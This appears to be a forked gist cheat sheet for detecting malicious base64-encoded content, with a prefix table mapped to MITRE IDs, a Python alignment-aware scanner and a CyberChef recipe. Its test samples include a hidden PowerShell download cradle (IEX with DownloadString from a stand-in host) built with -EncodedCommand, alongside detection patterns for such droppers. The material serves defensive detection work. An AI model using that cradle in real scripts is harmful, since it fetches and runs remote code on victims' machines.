@ashr
Forked from Neo23x0/Base64_CheatSheet.md
Created October 24, 2019 21:31
# Spot Malicious Base64 Encoded Code

## Learning Aid - Top Base64 Encodings Table

MITRE ATT&CK - T1132 - Data Encoding

The MITRE IDs in the table are the ones that were current when the sheet was written (October 2019). In ATT&CK versions with sub-techniques (v7, 2020, onward) T1086 became T1059.001 (PowerShell), T1064 (Scripting) was folded into T1059 (Command and Scripting Interpreter), and T1500 (Compile After Delivery) became T1027.004; T1001 and T1132 are unchanged.

| Base64 | Decoded (`.` = 0x00) | Description | MITRE ID |
|---|---|---|---|
| `JAB` | `$.` | Variable declaration: `$` followed by a byte in 0x40-0x7F, i.e. a letter or `_` (UTF-16) | T1086 |
| `TVq` | `MZ` | MZ header of a PE file (`TVqQ` when the usual `0x90 0x00` follow) | T1001 |
| `UEs` | `PK` | ZIP, Office documents (`UEsDB` for a local file header `PK\x03\x04`) | T1001 |
| `SUVY` | `IEX` | PowerShell Invoke-Expression | T1086 |
| `SQBFAF` | `I.E.` | PowerShell Invoke-Expression (UTF-16) | T1086 |
| `PAA` | `<.` | `<` followed by a byte below 0x40, e.g. `<#`; often used in Emotet command lines (UTF-16) | T1086 |
| `cwBhA` | `s.a.` | `sal` (the Set-Alias alias); often used in malicious droppers instead of a plain `var`-style declaration (UTF-16) | T1086 |
| `aWV4` | `iex` | PowerShell Invoke-Expression, lower case | T1086 |
| `aQBlA` | `i.e.` | PowerShell Invoke-Expression, lower case (UTF-16) | T1086 |
| `R2V0` | `Get` | Often used to obfuscate imports such as GetCurrentThreadId | T1001 |
| `dmFy` | `var` | Variable declaration in scripts such as JScript | T1064 |
| `dgBhA` | `v.a.` | Variable declaration (UTF-16) | T1064 |
| `dXNpbm` | `usin` | `using`; often found in compile-after-delivery attacks (C# source) | T1500 |

Two things to keep in mind when using these prefixes. Each one assumes the marker sits at the start of the encoded data: the same bytes at a different 3-byte alignment produce different base64 characters, so `IEX` is `SUVY` only when it begins at a byte offset that is a multiple of three. The last character of each prefix is only partly fixed by the marker (4 base64 characters carry 3 bytes, so a 2-byte marker fixes two characters fully and the top bits of a third), which is why `JAB` means `$` followed by any byte 0x40-0x7F rather than `$` exactly. The UTF-16 rows are what `powershell -EncodedCommand` produces, and a change of case (`IEX` versus `iex`) changes the whole encoding.
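The prefixes above are hand-picked for markers at the very start of the encoded data. As an added example (not code from the gist), the Python below derives the base64 form of any marker at each of the three byte alignments, for ASCII or UTF-16LE, and uses the result to scan text for base64 runs that contain them. The marker list is a subset of the table, the sample inputs are constructed (the PE one is the usual first bytes of a DOS header), and the `MIN_FIXED` threshold and the 16-character minimum run length are assumptions.

```python
"""Derive the base64 form of a plaintext marker at any 3-byte alignment and
scan text for it. Added example for the cheat sheet above, not gist code."""
import base64
import re

B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def b64_parts(token: bytes, offset: int = 0):
    """Split the base64 encoding of `token`, starting at plaintext byte
    position `offset` (mod 3), into the characters it fixes completely and
    the allowed values of the one trailing character it fixes only partly.
    Characters that also depend on bytes *before* the token are dropped, so
    the result is valid wherever the token occurs, provided no padding or
    line break falls inside it."""
    pad = offset % 3
    bits = "".join(f"{b:08b}" for b in b"\x00" * pad + token)
    first = -(-(pad * 8) // 6)      # ceil(pad*8/6): first char free of the leading bytes
    full = len(bits) // 6           # chars whose six bits all lie inside the token
    fixed = "".join(B64[int(bits[i * 6:i * 6 + 6], 2)] for i in range(first, full))
    rest = len(bits) - full * 6     # 0, 2 or 4 leftover bits of a partial char
    if rest == 0:
        return fixed, ""
    lo = int(bits[full * 6:].ljust(6, "0"), 2)   # lowest alphabet index with those high bits
    return fixed, B64[lo:lo + (1 << (6 - rest))]


def b64_pattern(token: bytes, offset: int = 0) -> str:
    """Regex for `token` at that alignment: literals plus one character class."""
    fixed, tail = b64_parts(token, offset)
    return re.escape(fixed) + (f"[{tail}]" if tail else "")


MARKERS = [  # (plaintext, description): a subset of the table above
    ("$".encode("utf-16-le"),   "PowerShell variable (UTF-16)"),
    (b"IEX",                    "PowerShell Invoke-Expression"),
    ("IEX".encode("utf-16-le"), "PowerShell Invoke-Expression (UTF-16)"),
    (b"iex",                    "PowerShell Invoke-Expression"),
    ("iex".encode("utf-16-le"), "PowerShell Invoke-Expression (UTF-16)"),
    ("<#".encode("utf-16-le"),  "PowerShell block comment (UTF-16), Emotet style"),
    (b"var",                    "JScript/JavaScript variable declaration"),
    (b"using",                  "C# source (compile after delivery)"),
    (b"MZ\x90\x00",             "PE (MZ) header"),
    (b"PK\x03\x04",             "ZIP / Office document"),
]

MIN_FIXED = 3   # assumption: fewer fully fixed chars is too noisy to search mid-stream


def build_rules():
    """One compiled regex per marker and alignment. Markers too short to
    search mid-stream (a lone `$`) are only checked at the start of a run,
    which is how the table uses them."""
    rules = []
    for raw, desc in MARKERS:
        for off in range(3):
            fixed, _ = b64_parts(raw, off)
            pat = b64_pattern(raw, off)
            if len(fixed) >= MIN_FIXED:
                rules.append((re.compile(pat), desc))
            elif off == 0:
                rules.append((re.compile("^" + pat), desc))
    return rules


RULES = build_rules()
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")   # assumption: 16+ chars looks like base64


def scan(text: str):
    """Sorted descriptions of every marker found in any base64-looking run."""
    hits = set()
    for run in B64_RUN.findall(text):
        for rx, desc in RULES:
            if rx.search(run):
                hits.add(desc)
    return sorted(hits)


def encoded_command(script: str) -> str:
    """What `powershell -EncodedCommand` expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples; the PE one is the usual first 27 bytes of a DOS header.
SAMPLES = {
    "ps_launcher": "powershell -nop -w hidden -enc " + encoded_command(
        "$u='http://example.invalid/ab';IEX (New-Object Net.WebClient).DownloadString($u)"),
    "js_dropper": base64.b64encode(b"var sh = new ActiveXObject('WScript.Shell');").decode(),
    "pe_blob": "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAA",
    "benign": "SGVsbG8sIFdvcmxkIQ==",
}

if __name__ == "__main__":
    for off in range(3):           # the same token looks different at each alignment
        print("IEX at offset", off, "->", b64_pattern(b"IEX", off))
    for name, text in SAMPLES.items():
        print(f"{name}: {scan(text)}")
```

Running it shows `IEX` as `SUVY` at alignment 0 but as `lFW` or `JRV` plus a partially fixed character at the other two, which is why a prefix from the table will miss the same cmdlet when it is preceded by a variable assignment of the wrong length; in the PowerShell sample above `IEX` starts at byte 62 and is caught by the alignment-2 pattern. YARA's `base64` string modifier applies the same three-alignment trick.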

## CyberChef Recipe

The recipe splits its input on newlines (`Fork`) and base64-decodes each line (`From_Base64`, non-alphabet characters removed), with the prefixes from the table preloaded as input, so opening it shows the decoded bytes next to each prefix:

https://gchq.github.io/CyberChef/#recipe=Fork('%5C%5Cn','%5C%5Cn',false)From_Base64('A-Za-z0-9%2B/%3D',true)&input=SkFCClRWcQpQQUEKU1VWWQpTUUJGQUYKYVdWNAphUUJsQQpSMlYwCmRtRnkKZGdCaEEKY3dCaEEKZFhOcGJt

## References

Tweet and thread: https://twitter.com/cyb3rops/status/1187341941794660354

Sample using `cwBhA`: https://www.hybrid-analysis.com/sample/b744129bfe54de8b36d7556ddfcc55d0be213129041aacf52b7d2f57012caa60?environmentId=100
